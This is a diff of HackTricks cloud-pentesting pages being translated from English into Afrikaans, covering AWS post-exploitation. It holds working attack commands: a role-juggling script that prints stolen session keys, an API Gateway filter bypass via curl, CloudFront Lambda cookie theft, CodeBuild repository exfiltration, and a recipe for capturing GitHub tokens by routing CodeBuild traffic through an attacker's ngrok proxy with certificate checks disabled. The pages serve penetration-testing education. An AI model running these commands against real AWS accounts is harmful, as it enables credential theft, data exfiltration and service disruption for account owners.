+$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($nextCredentials) {
+Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+Write-Host "Session Token: $($nextCredentials.SessionToken)"
+Write-Host "Expiration: $($nextCredentials.Expiration)"
+}
+} catch {
+$errorCount++
+}
+}
+}
 
-            # Reset environment variables
-            Remove-Item Env:\AWS_ACCESS_KEY_ID
-            Remove-Item Env:\AWS_SECRET_ACCESS_KEY
-            Remove-Item Env:\AWS_SESSION_TOKEN
-        } else {
-            $errorCount++
-        }
-    } catch {
-        $errorCount++
-    }
+# Reset environment variables
+Remove-Item Env:\AWS_ACCESS_KEY_ID
+Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+Remove-Item Env:\AWS_SESSION_TOKEN
+} else {
+$errorCount++
+}
+} catch {
+$errorCount++
+}
 }
 
 # Output the number of errors if any
 if ($errorCount -gt 0) {
-    Write-Host "$errorCount error(s) occurred during role assumption attempts."
+Write-Host "$errorCount error(s) occurred during role assumption attempts."
 } else {
-    Write-Host "No errors occurred. All roles checked successfully."
+Write-Host "No errors occurred. All roles checked successfully."
 }
 
 Write-Host "Role juggling check complete."
 ```
-
 </details>
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
index 53f79d916..941a860e3 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,6 +1 @@
 # AWS - Post Exploitation
-
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
index 4847c40e0..1566692d8 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
@@ -4,48 +4,43 @@
 
 ## API Gateway
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-api-gateway-enum.md
 {{#endref}}
 
-### Access unexposed APIs
+### Toegang tot nie-blootgestelde API's
 
-You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
-Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+Jy kan 'n eindpunt skep in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) met die diens `com.amazonaws.us-east-1.execute-api`, die eindpunt blootstel in 'n netwerk waar jy toegang het (potensieel via 'n EC2 masjien) en 'n sekuriteitsgroep toewys wat alle verbindings toelaat.\
+Dan, vanaf die EC2 masjien sal jy in staat wees om toegang tot die eindpunt te verkry en dus die gateway API aan te roep wat voorheen nie blootgestel was nie.
 
-### Bypass Request body passthrough
+### Omseil Versoek liggaam deurlaat
 
-This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+Hierdie tegniek is gevind in [**hierdie CTF skrywe**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
 
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
-
-Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+Soos aangedui in die [**AWS dokumentasie**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in die `PassthroughBehavior` afdeling, is die waarde **`WHEN_NO_MATCH`** , wanneer die **Content-Type** kop van die versoek nagegaan word, sal die versoek na die agterkant deurgee sonder enige transformasie.
 
+Daarom, in die CTF het die API Gateway 'n integrasiesjabloon gehad wat **die vlag verhinder het om uit te lek** in 'n antwoord wanneer 'n versoek gestuur is met `Content-Type: application/json`:
 ```yaml
 RequestTemplates:
-  application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
+application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
 ```
-
 However, sending a request with **`Content-type: text/json`** would prevent that filter.
 
 Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
-
 ```bash
 curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
 ```
+### Gebruik Planne DoS
 
-### Usage Plans DoS
+In die **Enumerasie** afdeling kan jy sien hoe om die **gebruik plan** van die sleutels te **verkry**. As jy die sleutel het en dit is **beperk** tot X gebruike **per maand**, kan jy dit **net gebruik en 'n DoS veroorsaak**.
 
-In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
-
-The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+Die **API Sleutel** moet net **ingesluit** wees in 'n **HTTP kop** genaamd **`x-api-key`**.
 
 ### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+'n Aanvaller met die toestemmings `apigateway:UpdateGatewayResponse` en `apigateway:CreateDeployment` kan **'n bestaande Gateway Response wysig om pasgemaakte koppe of respons sjablone in te sluit wat sensitiewe inligting lek of kwaadwillige skripte uitvoer**.
 ```bash
 API_ID="your-api-id"
 RESPONSE_TYPE="DEFAULT_4XX"
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Potensiële Impak**: Lek van sensitiewe inligting, uitvoering van kwaadwillige skripte, of ongemagtigde toegang tot API-hulpbronne.
 
 > [!NOTE]
-> Need testing
+> Nodig om te toets
 
 ### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
-
+'n Aanvaller met die regte `apigateway:UpdateStage` en `apigateway:CreateDeployment` kan **'n bestaande API Gateway-fase wysig om verkeer na 'n ander fase te herlei of die kasinstellings te verander om ongemagtigde toegang tot gekapte data te verkry**.
 ```bash
 API_ID="your-api-id"
 STAGE_NAME="Prod"
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
+**Potensiële Impak**: Onbevoegde toegang tot gekapte data, onderbreking of onderskepping van API-verkeer.
 
 > [!NOTE]
-> Need testing
+> Nodig om te toets
 
 ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+'n Aanvaller met die toestemmings `apigateway:PutMethodResponse` en `apigateway:CreateDeployment` kan **die metode-respons van 'n bestaande API Gateway REST API-metode wysig om pasgemaakte koptekste of respons-sjablone in te sluit wat sensitiewe inligting lek of kwaadwillige skripte uitvoer**.
 ```bash
 API_ID="your-api-id"
 RESOURCE_ID="your-resource-id"
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Potensiële Impak**: Lek van sensitiewe inligting, uitvoering van kwaadwillige skripte, of ongemagtigde toegang tot API-hulpbronne.
 
 > [!NOTE]
-> Need testing
+> Nodig om te toets
 
 ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
-
+'n Aanvaller met die regte `apigateway:UpdateRestApi` en `apigateway:CreateDeployment` kan **die API Gateway REST API-instellings wysig om logging te deaktiveer of die minimum TLS-weergawe te verander, wat moontlik die sekuriteit van die API verzwak**.
 ```bash
 API_ID="your-api-id"
 
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+**Potensiële Impak**: Verswakking van die sekuriteit van die API, wat moontlik ongeoorloofde toegang toelaat of sensitiewe inligting blootstel.
 
 > [!NOTE]
-> Need testing
+> Nodig om te toets
 
 ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
 
-An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
-
+'n Aanvaller met toestemmings `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, en `apigateway:CreateUsagePlanKey` kan **nuwe API-sleutels skep, dit met gebruiksplanne assosieer, en dan hierdie sleutels gebruik vir ongeoorloofde toegang tot API's**.
 ```bash
 # Create a new API key
 API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
@@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp
 # Associate the API key with the usage plan
 aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
 ```
-
-**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
+**Potensiële Impak**: Onbevoegde toegang tot API-hulpbronne, omseiling van sekuriteitsbeheer.
 
 > [!NOTE]
-> Need testing
+> Nodig om te toets
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
index 4a3c4ff21..cc5d53697 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## CloudFront
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-cloudfront-enum.md
@@ -12,24 +12,20 @@ For more information check:
 
 ### Man-in-the-Middle
 
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+Hierdie [**blogpos**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) stel 'n paar verskillende scenario's voor waar 'n **Lambda** bygevoeg (of gewysig indien dit reeds gebruik word) kan word in 'n **kommunikasie deur CloudFront** met die doel om **gebruikersinligting** (soos die sessie **cookie**) te **steel** en die **antwoord** te **wysig** (injecting 'n kwaadwillige JS-skrip).
 
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+#### scenario 1: MitM waar CloudFront geconfigureer is om toegang te verkry tot 'n HTML van 'n emmer
 
-- **Create** the malicious **function**.
-- **Associate** it with the CloudFront distribution.
-- Set the **event type to "Viewer Response"**.
+- **Skep** die kwaadwillige **funksie**.
+- **Koppel** dit aan die CloudFront verspreiding.
+- Stel die **gebeurtenistipe op "Viewer Response"**.
 
-Accessing the response you could steal the users cookie and inject a malicious JS.
+Deur die antwoord te benader, kan jy die gebruikers se cookie steel en 'n kwaadwillige JS injecteer.
 
-#### scenario 2: MitM where CloudFront is already using a lambda function
+#### scenario 2: MitM waar CloudFront reeds 'n lambda-funksie gebruik
 
-- **Modify the code** of the lambda function to steal sensitive information
+- **Wysig die kode** van die lambda-funksie om sensitiewe inligting te steel
 
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+Jy kan die [**tf kode om hierdie scenario's hier te hercreëer**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main) nagaan.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
index 54be4e299..1c86452de 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -4,85 +4,73 @@
 
 ## CodeBuild
 
-For more information, check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../../aws-services/aws-codebuild-enum.md
 {{#endref}}
 
-### Check Secrets
+### Kontroleer Geheimen
 
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+As geloofsbriewe in Codebuild gestel is om met Github, Gitlab of Bitbucket te verbind in die vorm van persoonlike tokens, wagwoorde of OAuth-token toegang, **sal hierdie geloofsbriewe as geheimen in die geheimbestuurder gestoor word**.\
+Daarom, as jy toegang het om die geheimbestuurder te lees, sal jy in staat wees om hierdie geheimen te verkry en na die gekonnekteerde platform te pivot.
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-secrets-manager-privesc.md
 {{#endref}}
 
-### Abuse CodeBuild Repo Access
+### Misbruik van CodeBuild Repo Toegang
 
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+Om **CodeBuild** te konfigureer, sal dit **toegang tot die kode-repo** benodig wat dit gaan gebruik. Verskeie platforms kan hierdie kode aanbied:
 
 <figure><img src="../../../../images/image (96).png" alt=""><figcaption></figcaption></figure>
 
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+Die **CodeBuild-projek moet toegang hê** tot die geconfigureerde bronverskaffer, hetsy via **IAM-rol** of met 'n github/bitbucket **token of OAuth-toegang**.
 
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+'n Aanvaller met **verhoogde regte oor 'n CodeBuild** kan hierdie geconfigureerde toegang misbruik om die kode van die geconfigureerde repo en ander waar die ingestelde geloofsbriewe toegang het, te lek.\
+Om dit te doen, sal 'n aanvaller net die **repo-URL na elke repo wat die konfigurasiegeloofsbriewe toegang het, moet verander** (let daarop dat die aws-webwerf al hulle vir jou sal lys):
 
 <figure><img src="../../../../images/image (107).png" alt=""><figcaption></figcaption></figure>
 
-And **change the Buildspec commands to exfiltrate each repo**.
+En **verander die Buildspec-opdragte om elke repo te exfiltreer**.
 
 > [!WARNING]
-> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-> Or does he? Check the next section
+> egter, hierdie **taak is herhalend en vervelig** en as 'n github-token met **skryfregte** geconfigureer is, sal 'n aanvaller **nie in staat wees om (mis)bruik te maak van daardie regte** nie, aangesien hy nie toegang het tot die token.\
+> Of het hy? Kyk na die volgende afdeling
 
-### Leaking Access Tokens from AWS CodeBuild
-
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+### Lek van Toegangstokens van AWS CodeBuild
 
+Jy kan toegang lek wat in CodeBuild aan platforms soos Github gegee is. Kyk of enige toegang tot eksterne platforms gegee is met:
 ```bash
 aws codebuild list-source-credentials
 ```
-
 {{#ref}}
 aws-codebuild-token-leakage.md
 {{#endref}}
 
 ### `codebuild:DeleteProject`
 
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
-
+'n Aanvaller kan 'n hele CodeBuild-projek verwyder, wat tot verlies van projekkonfigurasie lei en toepassings wat op die projek staatmaak, beïnvloed.
 ```bash
 aws codebuild delete-project --name <value>
 ```
-
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+**Potensiële Impak**: Verlies van projekkonfigurasie en diensonderbreking vir toepassings wat die verwyderde projek gebruik.
 
 ### `codebuild:TagResource` , `codebuild:UntagResource`
 
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+'n Aanvaller kan etikette byvoeg, wysig of verwyder van CodeBuild hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing en toegangbeheerbeleide gebaseer op etikette ontwrig.
 ```bash
 aws codebuild tag-resource --resource-arn <value> --tags <value>
 aws codebuild untag-resource --resource-arn <value> --tag-keys <value>
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potensiële Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide.
 
 ### `codebuild:DeleteSourceCredentials`
 
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
-
+'n Aanvaller kan bronbewyse vir 'n Git-repositori verwyder, wat die normale funksionering van toepassings wat op die repositori staatmaak, beïnvloed.
 ```sql
 aws codebuild delete-source-credentials --arn <value>
 ```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+**Potensiële Impak**: Ontwrichting van normale funksionering vir toepassings wat op die betrokke repo staatmaak as gevolg van die verwydering van bronbewyse.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index c514d7a7c..4a5619724 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -2,73 +2,68 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Recover Github/Bitbucket Configured Tokens
-
-First, check if there are any source credentials configured that you could leak:
+## Herwin Github/Bitbucket Geconfigureerde Tokens
 
+Eerst, kyk of daar enige bronakkrediteure geconfigureer is wat jy kan lek:
 ```bash
 aws codebuild list-source-credentials
 ```
-
 ### Via Docker Image
 
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+As jy vind dat outentisering na byvoorbeeld Github in die rekening ingestel is, kan jy **exfiltrate** daardie **toegang** (**GH token of OAuth token**) deur Codebuild te laat **gebruik 'n spesifieke docker image** om die bou van die projek te loop.
 
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+Vir hierdie doel kan jy **'n nuwe Codebuild projek skep** of die **omgewing** van 'n bestaande een verander om die **Docker image** in te stel.
 
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
+Die Docker image wat jy kan gebruik is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). Dit is 'n baie basiese Docker image wat die **env veranderlikes `https_proxy`**, **`http_proxy`** en **`SSL_CERT_FILE`** sal stel. Dit sal jou toelaat om die meeste van die verkeer van die gasheer wat in **`https_proxy`** en **`http_proxy`** aangedui is, te onderskep en die SSL CERT wat in **`SSL_CERT_FILE`** aangedui is, te vertrou.
 
-1. **Create & Upload your own Docker MitM image**
-   - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
-     - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
-   - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
-   - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
-2. **Set the environment**
-   - Create a **new Codebuild project** or **modify** the environment of an existing one.
-   - Set the project to use the **previously generated Docker image**
+1. **Skep & Laai jou eie Docker MitM image op**
+- Volg die instruksies van die repo om jou proxy IP adres in te stel en jou SSL sertifikaat in te stel en **bou die docker image**.
+- **MOENIE `http_proxy` INSTEL NIE** om nie versoeke na die metadata eindpunt te onderskep nie.
+- Jy kan **`ngrok`** gebruik soos `ngrok tcp 4444` om die proxy na jou gasheer in te stel.
+- Sodra jy die Docker image gebou het, **laai dit op na 'n openbare repo** (Dockerhub, ECR...)
+2. **Stel die omgewing in**
+- Skep 'n **nuwe Codebuild projek** of **wysig** die omgewing van 'n bestaande een.
+- Stel die projek in om die **voorheen gegenereerde Docker image** te gebruik.
 
 <figure><img src="../../../../images/image (23).png" alt=""><figcaption></figcaption></figure>
 
-3. **Set the MitM proxy in your host**
-
-- As indicated in the **Github repo** you could use something like:
+3. **Stel die MitM proxy in jou gasheer in**
 
+- Soos aangedui in die **Github repo** kan jy iets soos gebruik:
 ```bash
 mitmproxy --listen-port 4444  --allow-hosts "github.com"
 ```
-
 > [!TIP]
-> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+> Die **mitmproxy weergawe wat gebruik is, was 9.0.1**, daar is gerapporteer dat dit met weergawe 10 dalk nie sal werk nie.
 
-4. **Run the build & capture the credentials**
+4. **Voer die bou uit & vang die geloofsbriewe**
 
-- You can see the token in the **Authorization** header:
+- Jy kan die token in die **Authorization** koptekst sien:
 
-  <figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>
-
-This could also be done from the aws cli with something like
+<figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>
 
+Dit kan ook vanaf die aws cli gedoen word met iets soos
 ```bash
 # Create project using a Github connection
 aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
 
 ## With /tmp/buildspec.json
 {
-    "name": "my-demo-project",
-    "source": {
-        "type": "GITHUB",
-        "location": "https://github.com/uname/repo",
-        "buildspec": "buildspec.yml"
-    },
-    "artifacts": {
-        "type": "NO_ARTIFACTS"
-    },
-    "environment": {
-        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
-        "image": "docker.io/carlospolop/docker-mitm:v12",
-        "computeType": "BUILD_GENERAL1_SMALL",
-        "imagePullCredentialsType": "CODEBUILD"
-    }
+"name": "my-demo-project",
+"source": {
+"type": "GITHUB",
+"location": "https://github.com/uname/repo",
+"buildspec": "buildspec.yml"
+},
+"artifacts": {
+"type": "NO_ARTIFACTS"
+},
+"environment": {
+"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+"image": "docker.io/carlospolop/docker-mitm:v12",
+"computeType": "BUILD_GENERAL1_SMALL",
+"imagePullCredentialsType": "CODEBUILD"
+}
 }
 
 ## Json
@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
 # Start the build
 aws codebuild start-build --project-name my-project2
 ```
-
 ### Via insecureSSL
 
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
-
-- First you need to enumerate the current configuration with something like:
+**Codebuild** projekte het 'n instelling genaamd **`insecureSsl`** wat in die web versteek is en jy kan dit slegs vanaf die API verander.\
+Deur dit in te skakel, kan Codebuild met die repository verbind **sonder om die sertifikaat** wat deur die platform aangebied word, te kontroleer.
 
+- Eerstens moet jy die huidige konfigurasie opnoem met iets soos:
 ```bash
 aws codebuild batch-get-projects --name <proj-name>
 ```
-
-- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
-  - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
-
+- Dan, met die ingesamelde inligting kan jy die projekinstelling **`insecureSsl`** op **`True`** opdateer. Die volgende is 'n voorbeeld van my opdatering van 'n projek, let op die **`insecureSsl=True`** aan die einde (dit is die enigste ding wat jy moet verander van die ingesamelde konfigurasie).
+- Boonop, voeg ook die omgewing veranderlikes **http_proxy** en **https_proxy** by wat na jou tcp ngrok wys soos:
 ```bash
 aws codebuild update-project --name <proj-name> \
-    --source '{
-        "type": "GITHUB",
-        "location": "https://github.com/carlospolop/404checker",
-        "gitCloneDepth": 1,
-        "gitSubmodulesConfig": {
-            "fetchSubmodules": false
-        },
-        "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
-        "auth": {
-            "type": "CODECONNECTIONS",
-            "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
-        },
-        "reportBuildStatus": false,
-        "insecureSsl": true
-    }' \
-    --environment '{
-        "type": "LINUX_CONTAINER",
-        "image": "aws/codebuild/standard:5.0",
-        "computeType": "BUILD_GENERAL1_SMALL",
-        "environmentVariables": [
-            {
-                "name": "http_proxy",
-                "value": "http://2.tcp.eu.ngrok.io:15027"
-            },
-            {
-                "name": "https_proxy",
-                "value": "http://2.tcp.eu.ngrok.io:15027"
-            }
-        ]
-    }'
+--source '{
+"type": "GITHUB",
+"location": "https://github.com/carlospolop/404checker",
+"gitCloneDepth": 1,
+"gitSubmodulesConfig": {
+"fetchSubmodules": false
+},
+"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
+"auth": {
+"type": "CODECONNECTIONS",
+"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+},
+"reportBuildStatus": false,
+"insecureSsl": true
+}' \
+--environment '{
+"type": "LINUX_CONTAINER",
+"image": "aws/codebuild/standard:5.0",
+"computeType": "BUILD_GENERAL1_SMALL",
+"environmentVariables": [
+{
+"name": "http_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+},
+{
+"name": "https_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+}
+]
+}'
 ```
-
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Dan, voer die basiese voorbeeld van [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) uit in die poort aangedui deur die proxy veranderlikes (http_proxy en https_proxy)
 ```python
 from mitm import MITM, protocol, middleware, crypto
 
 mitm = MITM(
-    host="127.0.0.1",
-    port=4444,
-    protocols=[protocol.HTTP],
-    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
-    certificate_authority = crypto.CertificateAuthority()
